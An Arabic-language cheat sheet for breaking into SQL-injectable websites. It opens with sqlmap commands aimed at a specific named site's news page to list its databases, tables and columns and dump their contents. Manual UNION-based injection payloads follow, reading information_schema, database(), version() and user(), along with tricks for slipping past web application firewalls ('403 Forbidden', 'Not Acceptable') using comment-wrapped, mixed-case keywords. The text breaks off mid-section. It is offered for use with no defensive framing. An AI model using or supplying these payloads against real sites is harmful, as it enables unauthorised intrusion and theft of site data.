اوامر اختراق مواقع مصابة sql :)
sqlmap -u http://www.c2-int.com/news-full.php?id=1278 --dbs

sqlmap -u http://www.c2-int.com/news-full.php?id=1278 -D ( database) --tables

sqlmap -u http://www.c2-int.com/news-full.php?id=1278 -D ( database) -T (table) --columns

sqlmap -u http://www.example.com/data.php?id=12 -D ( database) -T (table) -C (column) --dump
-----------------------------------------------------------
               
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
أوامر SqL Injection
==============================
أمر استخراج عدد الأعمدة
==============================
+order+by+
==============================
أمر استخراج العامود المصاب
==============================
+union+select+
==============================
أمر استخراج اسم قاعدة البيانات
==============================
Database()
==============================
أمر استخراج اصدار قاعدة البيانات
==============================
Version()
==============================
أمر استخراج يوزر قاعدة البيانات
User()
==============================
أمر استخراج الجداول
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(table_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
أمر استخراج الأعمدة
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(column_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not